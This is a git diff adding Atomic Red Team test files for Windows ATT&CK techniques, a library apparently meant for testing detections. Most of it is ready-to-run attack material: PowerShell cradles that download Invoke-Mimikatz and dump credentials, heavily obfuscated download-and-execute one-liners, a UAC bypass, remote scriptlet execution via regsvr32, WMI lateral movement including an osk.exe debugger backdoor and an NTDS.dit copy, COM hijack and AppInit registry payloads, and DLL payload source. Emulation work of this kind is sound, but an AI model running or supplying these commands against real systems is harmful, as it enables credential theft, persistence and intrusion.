+[InstallUtilBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/InstallUtilBypass.cs) + diff --git a/Windows/Execution/PowerShell.md b/Windows/Execution/PowerShell.md new file mode 100644 index 00000000..fe138955 --- /dev/null +++ b/Windows/Execution/PowerShell.md @@ -0,0 +1,68 @@ +# PowerShell + +MITRE ATT&CK Technique: [T1086](https://attack.mitre.org/wiki/Technique/T1086) + +### Download Mimikatz and Dump credentials + + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" + +### Download Mimikatz and Dump credentials + +Just download it: + + (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) + +Minor obfuscation: + + (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() + +All obfuscation: + + Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) + +Mimikatz - Cradlecraft PsSendKeys + + $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr + +### Invoke-AppPathBypass + +Note: Windows 10 only + +Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ + + Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass" + +At prompt, to test: + + C:\Windows\System32\cmd.exe + +### Obfuscated Powershell + +Fancy obfuscation that reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" + + cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -" + +Second test: + + cmd /c "set apple=fish (cars ('http://bit.ly/L3g1tCrad1e).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -" + +## Powershell Obfuscation + +Provided by @danielbohannon + +[Out-FINcodedCommand](https://github.com/danielbohannon/Out-FINcodedCommand/blob/master/README.md) + + +Setup: + + Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/danielbohannon/Out-FINcodedCommand/master/Out-FINcodedCommand.ps1') + +Input: + + Out-FINcodedCommand -command "iex (iwr http://bit.ly/L3g1t).content" -FinalBinary powershell + +Follow prompts to create variables. + +Output: + + cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -" diff --git a/Windows/Execution/RegsvcsRegasm.md b/Windows/Execution/RegsvcsRegasm.md new file mode 100644 index 00000000..a65c88c5 --- /dev/null +++ b/Windows/Execution/RegsvcsRegasm.md @@ -0,0 +1,22 @@ +## Regsvcs/Regasm + +MITRE ATT&CK Technique: [T1121](https://attack.mitre.org/wiki/Technique/T1121) + +### Execution Examples: + +[DLL](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings) + +Input: + + x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll + + x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll + + + x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll + + x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll + + +## Test Script +[RegSvcsRegAsmBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs) diff --git a/Windows/Execution/Regsvr32.md b/Windows/Execution/Regsvr32.md new file mode 100644 index 00000000..1f790250 --- /dev/null +++ b/Windows/Execution/Regsvr32.md @@ -0,0 +1,16 @@ +## Regsvr32 + +MITRE ATT&CK Technique: [T1117](https://attack.mitre.org/wiki/Technique/T1117) + +### Local Scriptlet Execution: + + regsvr32.exe /s /u /i:file.sct scrobj.dll + +### Remote Scriptlet Exection: + + regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll + +## Test Script + +[regsvr32.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvr32.sct) + diff --git a/Windows/Execution/Rundll32.md b/Windows/Execution/Rundll32.md new file mode 100644 index 00000000..0d8164bd --- /dev/null +++ b/Windows/Execution/Rundll32.md @@ -0,0 +1,13 @@ +## Rundll32 + +MITRE ATT&CK Technique: [T1085](https://attack.mitre.org/wiki/Technique/T1085) + +### Executes an export inside of a dll. + + rundll32 AllTheThings.dll,EntryPoint + +## Test Script + +[AlltheThings.dll](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings) + + diff --git a/Windows/Execution/Trusted_Developer_Utilities.md b/Windows/Execution/Trusted_Developer_Utilities.md new file mode 100644 index 00000000..47992d0d --- /dev/null +++ b/Windows/Execution/Trusted_Developer_Utilities.md @@ -0,0 +1,12 @@ +## Trusted Developer Utilities + +MITRE ATT&CK Technique: [T1127](https://attack.mitre.org/wiki/Technique/T1127) + +### MSBuild.exe - [Inline Tasks](https://msdn.microsoft.com/en-us/library/dd722601.aspx) + + C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe File.csproj + +## Test Script + +[MSBuildBypass.csproj](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/MSBuildBypass.csproj) + diff --git a/Windows/Execution/Windows_Management_Instrumentation.md b/Windows/Execution/Windows_Management_Instrumentation.md new file mode 100644 index 00000000..31eaae36 --- /dev/null +++ b/Windows/Execution/Windows_Management_Instrumentation.md @@ -0,0 +1,45 @@ +## Windows Management Instrumentation + +MITRE ATT&CK Technique: [T1047](https://attack.mitre.org/wiki/Technique/T1047) + +### Reconnaissance + +Input: + + wmic useraccount get /ALL + +Input: + + wmic process get caption,executablepath,commandline + +Input: + + wmic qfe get description,installedOn /format:csv + +Input: + + wmic /node:"192.168.0.1" service where (caption like "%sql server (%") + +Input: + + get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" + +### Lateral Movement + +Input: + + wmic /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" + +Input: + + wmic /NODE: "192.168.0.1" process call create "evil.exe" + +### Privileged Escalation + +Input: + + wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" + +Input: + + wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" diff --git a/Windows/Lateral Movement/Windows Admin Shares.md b/Windows/Lateral Movement/Windows Admin Shares.md new file mode 100644 index 00000000..2354bc61 --- /dev/null +++ b/Windows/Lateral Movement/Windows Admin Shares.md @@ -0,0 +1,15 @@ +## Windows Admin Shares + +MITRE ATT&CK Technique: [T1077](https://attack.mitre.org/wiki/Technique/T1077) + +Input: + + cmd.exe /c "net use \\\ipc$ P@ssw0rd1 /u:\Administrator" + +Input: + + cmd.exe /c "net use \\\admin$ P@ssw0rd1 /u:\Administrator" + +Input: + + cmd.exe /c "net use \\\c$ P@ssw0rd1 /u:\Administrator" diff --git a/Windows/Lateral Movement/Windows Remote Management.md b/Windows/Lateral Movement/Windows Remote Management.md new file mode 100644 index 00000000..f8f4fe91 --- /dev/null +++ b/Windows/Lateral Movement/Windows Remote Management.md @@ -0,0 +1,33 @@ +## Windows Remote Management + +MITRE ATT&CK Technique: [T1028](https://attack.mitre.org/wiki/Technique/T1028) + +### Enable Windows Remote Management + +Input: + + powershell Enable-PSRemoting -Force + +### Powershell lateral movement using the mmc20 application com object + +Input: + + powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") + +Reference: + +https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ + + +### WMIC Process Call Create + + wmic /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" + +### PowerSploit Invoke-Mimikatz WinRM + + powershell-import /local/path/to/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1 + powershell Invoke-Mimikatz -ComputerName TARGET + +Reference: + + https://blog.cobaltstrike.com/2015/07/22/winrm-is-my-remote-access-tool/ diff --git a/Windows/Payloads/AllTheThings/AllTheThingsx64.dll b/Windows/Payloads/AllTheThings/AllTheThingsx64.dll new file mode 100755 index 0000000000000000000000000000000000000000..770a7e0c8301da41477f4ca747a3f30a66aa5cd3 GIT binary patch literal 7168 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 DllUnregisterServer + regsvr32 /s AllTheThings.dll --> Calls DllRegisterServer +5. + rundll32 AllTheThings.dll,EntryPoint + +*/ + +[assembly: ApplicationActivation(ActivationOption.Server)] +[assembly: ApplicationAccessControl(false)] + +public class Program +{ + public static void Main() + { + Console.WriteLine("Hello From Main...I Don't Do Anything"); + //Add any behaviour here to throw off sandbox execution/analysts :) + } + +} + +public class Thing0 +{ + public static void Exec() + { + ProcessStartInfo startInfo = new ProcessStartInfo(); + startInfo.FileName = "calc.exe"; + Process.Start(startInfo); + } +} + +[System.ComponentModel.RunInstaller(true)] +public class Thing1 : System.Configuration.Install.Installer +{ + //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. + public override void Uninstall(System.Collections.IDictionary savedState) + { + + Console.WriteLine("Hello There From Uninstall"); + Thing0.Exec(); + + } + +} + +[ComVisible(true)] +[Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")] +[ClassInterface(ClassInterfaceType.None)] +[ProgId("dllguest.Bypass")] +[Transaction(TransactionOption.Required)] +public class Bypass : ServicedComponent +{ + public Bypass() { Console.WriteLine("I am a basic COM Object"); } + + [ComRegisterFunction] //This executes if registration is successful + public static void RegisterClass(string key) + { + Console.WriteLine("I shouldn't really execute"); + Thing0.Exec(); + } + + [ComUnregisterFunction] //This executes if registration fails + public static void UnRegisterClass(string key) + { + Console.WriteLine("I shouldn't really execute either."); + Thing0.Exec(); + } + + public void Exec() { Thing0.Exec(); } +} + +class Exports +{ + + // + // + //rundll32 entry point + [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)] + public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow) + { + Thing0.Exec(); + } + [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)] + public static void DllRegisterServer() + { + Thing0.Exec(); + } + [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)] + public static void DllUnregisterServer() + { + Thing0.Exec(); + } + + + +} diff --git a/Windows/Payloads/AllTheThings/test.bat b/Windows/Payloads/AllTheThings/test.bat new file mode 100755 index 00000000..e6fb5efa --- /dev/null +++ b/Windows/Payloads/AllTheThings/test.bat @@ -0,0 +1,18 @@ + +REM X86 +Executing X86 AllTheThings Test +C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll +regsvr32.exe /s /u AllTheThingsx86.dll +regsvr32.exe /s AllTheThingsx86.dll +rundll32 AllTheThingsx86.dll,EntryPoint + +REM AMD64 + +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll +regsvr32.exe /s /u AllTheThingsx64.dll +regsvr32.exe /s AllTheThingsx64.dll +rundll32 AllTheThingsx64.dll,EntryPoint diff --git a/Windows/Payloads/AppInitInject.reg b/Windows/Payloads/AppInitInject.reg new file mode 100644 index 00000000..f9303562 --- /dev/null +++ b/Windows/Payloads/AppInitInject.reg @@ -0,0 +1,6 @@ +Windows Registry Editor Version 5.00 + +[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] +"AppInit_DLLs"="C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll" +"LoadAppInit_DLLs"=dword:00000001 +"RequireSignedAppInit_DLLs"=dword:00000000 diff --git a/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct b/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct new file mode 100755 index 00000000..830f48b1 --- /dev/null +++ b/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct @@ -0,0 +1,22 @@ + + + + + + + + + \ No newline at end of file diff --git a/Windows/Payloads/COMHijackScripts/COMHijack.reg b/Windows/Payloads/COMHijackScripts/COMHijack.reg new file mode 100755 index 00000000..7ea5eb31 --- /dev/null +++ b/Windows/Payloads/COMHijackScripts/COMHijack.reg @@ -0,0 +1,23 @@ +Windows Registry Editor Version 5.00 +[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] +@="AtomicRedTeam" +[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] +@="{00000001-0000-0000-0000-0000FEEDACDC}" +[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] +@="AtomicRedTeam" +[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] +@="{00000001-0000-0000-0000-0000FEEDACDC}" +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] +@="AtomicRedTeam" +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32] +@="C:\\WINDOWS\\system32\\scrobj.dll" +"ThreadingModel"="Apartment" +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID] +@="AtomicRedTeam.1.00" +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL] +@="https://gist.githubusercontent.com/subTee/91861699acaa1bd0da493c8a79035eb9/raw/bb38d92a543084207e0f14a1f2c4dde15db84659/AtomicRedTeam.sct" +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID] +@="AtomicRedTeam" +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}] +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs] +@="{00000001-0000-0000-0000-0000FEEDACDC}" diff --git a/Windows/Payloads/COMHijackScripts/COMHijackCleanup.reg b/Windows/Payloads/COMHijackScripts/COMHijackCleanup.reg new file mode 100755 index 00000000..1313fad6 --- /dev/null +++ b/Windows/Payloads/COMHijackScripts/COMHijackCleanup.reg @@ -0,0 +1,5 @@ +Windows Registry Editor Version 5.00 +[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] +[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] +[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] +[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}] diff --git a/Windows/Payloads/COMHijackScripts/test.bat b/Windows/Payloads/COMHijackScripts/test.bat new file mode 100755 index 00000000..06638ea6 --- /dev/null +++ b/Windows/Payloads/COMHijackScripts/test.bat @@ -0,0 +1,3 @@ +reg import COMHijack.reg +certutil.exe -CAInfo +reg import COMHijackCleanup.reg diff --git a/Windows/Payloads/DllInject/DLLInjection.cs b/Windows/Payloads/DllInject/DLLInjection.cs new file mode 100755 index 00000000..b67faf3c --- /dev/null +++ b/Windows/Payloads/DllInject/DLLInjection.cs @@ -0,0 +1,84 @@ +using System; +using System.Diagnostics; +using System.Runtime.InteropServices; +using System.Text; + + +// Source : http://www.codingvision.net/miscellaneous/c-inject-a-dll-into-a-process-w-createremotethread +// C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe DLLInjection.cs +// You will want to change target process, or dll name, depending on architecture. 